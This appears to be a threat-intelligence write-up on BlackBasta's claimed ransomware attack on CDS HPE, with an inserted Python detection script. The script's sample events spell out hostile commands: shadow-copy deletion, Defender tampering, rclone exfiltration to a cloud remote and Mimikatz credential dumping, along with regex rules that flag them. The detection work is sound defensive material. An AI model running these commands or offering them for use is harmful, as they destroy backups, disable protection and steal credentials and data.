In-Depth Analysis of BlackBasta Ransomware Attack on CDS HPE: Data Exfiltration and Impact

Incident Date: Jul 15, 2024

Attack Overview
VICTIM
CDS HPE
INDUSTRY
Business Services
LOCATION
Italy
ATTACKER
Blackbasta
FIRST REPORTED
July 15, 2024

Ransomware Attack on CDS HPE by BlackBasta: A Detailed Analysis

Overview of CDS HPE

CDS HPE, a wholly-owned subsidiary of Hewlett Packard Enterprise (HPE), operates primarily in Europe, delivering customized technical services and support across various sectors. Established following HPE's acquisition of Synstar, CDS has built a strong reputation in providing infrastructure technical support, including field maintenance, installations, networking support, system administration, and software development. The company employs over 1,500 individuals across ten European countries and reported an annual revenue of approximately $115 million in 2024.

Attack Details

The ransomware group BlackBasta has claimed responsibility for a cyberattack on CDS HPE. The attackers reportedly exfiltrated 500 GB of sensitive data, including internal company information, confidential documents, human resources and hiring records, personal employee records, client data, and project details. The group set a ransom deadline of July 23, 2024, pressuring CDS HPE to pay in order to prevent the stolen data from being published or misused.

About BlackBasta

BlackBasta is a ransomware operator and Ransomware-as-a-Service (RaaS) criminal enterprise that emerged in early 2022. The group is believed to have connections to the defunct Conti threat actor group. BlackBasta conducts highly targeted attacks and employs double extortion: it encrypts critical data and threatens to publish stolen information on its public leak site if the ransom is not paid. The group has hit more than 500 organizations worldwide and is estimated to have collected up to $100 million in ransom payments from more than 90 victims since it emerged.

Penetration Methods

BlackBasta uses several routes to gain initial access to target networks, including spear-phishing campaigns, insider information, and purchased network access. Once inside, the group moves laterally and harvests credentials using tools such as QakBot and Mimikatz and by exploiting vulnerabilities. To maintain control over compromised systems it relies on Cobalt Strike Beacons and SystemBC, and it stages data for exfiltration with Rclone. Before encrypting files, the group disables security tools, deletes volume shadow copies, and exfiltrates sensitive data to maximize its leverage.
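The pre-encryption sequence described above (credential dumping, security-tool tampering, shadow copy deletion, Rclone exfiltration) leaves process-creation evidence that defenders can hunt for. The script below is an added example written for this page, not Halcyon's tooling or anything recovered from the CDS HPE incident: it runs a small set of command-line rules over constructed Sysmon/4688-style process events. The host names, users, timestamps and command lines are invented; the command-line patterns are the generic, publicly documented forms of each technique rather than artifacts from this attack.

```python
import re
from dataclasses import dataclass

# Constructed process-creation records (Sysmon Event ID 1 / Security 4688 style).
# Illustrative samples only; not logs from the CDS HPE incident.
SAMPLE_EVENTS = [
    {"ts": "2024-07-10T09:12:01Z", "host": "WS-014", "user": "j.rossi",
     "image": r"C:\Windows\System32\vssadmin.exe",
     "cmd": "vssadmin.exe delete shadows /all /quiet"},
    {"ts": "2024-07-10T09:12:05Z", "host": "WS-014", "user": "j.rossi",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmd": "powershell.exe -ep bypass Set-MpPreference -DisableRealtimeMonitoring $true"},
    {"ts": "2024-07-10T08:40:22Z", "host": "FS-02", "user": "svc_backup",
     "image": r"C:\Users\Public\rclone.exe",
     "cmd": "rclone.exe copy \\\\FS-02\\Projects remote:bucket/projects --transfers 16"},
    {"ts": "2024-07-09T17:02:10Z", "host": "DC-01", "user": "svc_backup",
     "image": r"C:\Windows\System32\cmd.exe",
     "cmd": "wmic shadowcopy delete"},
    {"ts": "2024-07-09T16:55:00Z", "host": "DC-01", "user": "svc_backup",
     "image": r"C:\Temp\m.exe",
     "cmd": "m.exe privilege::debug sekurlsa::logonpasswords exit"},
    # Benign control: listing shadow copies is routine admin work, not deletion.
    {"ts": "2024-07-10T10:00:00Z", "host": "WS-020", "user": "a.bianchi",
     "image": r"C:\Windows\System32\vssadmin.exe",
     "cmd": "vssadmin.exe list shadows"},
]

# One regex per stage of the pre-encryption chain the article describes.
RULES = {
    "shadow_copy_deletion": re.compile(
        r"(vssadmin(\.exe)?\s+delete\s+shadows|wmic(\.exe)?\s+shadowcopy\s+delete)", re.I),
    "defender_tampering": re.compile(r"Set-MpPreference\s+-Disable\w+", re.I),
    # rclone <copy|sync|move> <local path> <remote>:<path>
    "rclone_exfiltration": re.compile(r"rclone(\.exe)?\s+(copy|sync|move)\s+\S+\s+\w+:", re.I),
    # Mimikatz module syntax survives even when the binary is renamed (m.exe above).
    "mimikatz_credential_dump": re.compile(r"(sekurlsa::|lsadump::|privilege::debug)", re.I),
}


@dataclass(frozen=True)
class Finding:
    ts: str
    host: str
    user: str
    rule: str
    cmd: str


def detect(events):
    """Run every rule over each event's command line; return findings in time order."""
    findings = []
    for ev in events:
        for name, pattern in RULES.items():
            if pattern.search(ev["cmd"]):
                findings.append(Finding(ev["ts"], ev["host"], ev["user"], name, ev["cmd"]))
    return sorted(findings, key=lambda f: f.ts)


def rules_per_host(findings):
    """Map each host to the set of distinct rules that fired on it."""
    hosts = {}
    for f in findings:
        hosts.setdefault(f.host, set()).add(f.rule)
    return hosts


def high_confidence_hosts(findings, min_rules=2):
    """Hosts where two or more distinct stages fired; a lone hit may be admin activity."""
    return sorted(h for h, rules in rules_per_host(findings).items() if len(rules) >= min_rules)


if __name__ == "__main__":
    hits = detect(SAMPLE_EVENTS)
    for f in hits:
        print(f"{f.ts} {f.host:<7} {f.user:<11} {f.rule:<25} {f.cmd}")
    print("escalate:", high_confidence_hosts(hits))
```

The benign `vssadmin list shadows` record shows why the shadow-copy rule keys on the delete verb rather than the binary name. Hosts with a single hit (FS-02 here) are not discarded: Rclone pushing a file-server share to a cloud remote is worth a look on its own, but hosts where several stages fire within a short window are where response should start.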

Vulnerabilities and Impact

CDS HPE's broad operational footprint and large workforce make it an attractive target for groups like BlackBasta. Because it delivers customized technical services and support across many sectors, the company handles sensitive client and employee data, which raises the stakes of any breach. The exfiltration of 500 GB of such data could have significant repercussions for CDS HPE, including financial losses, reputational damage, and operational disruption.
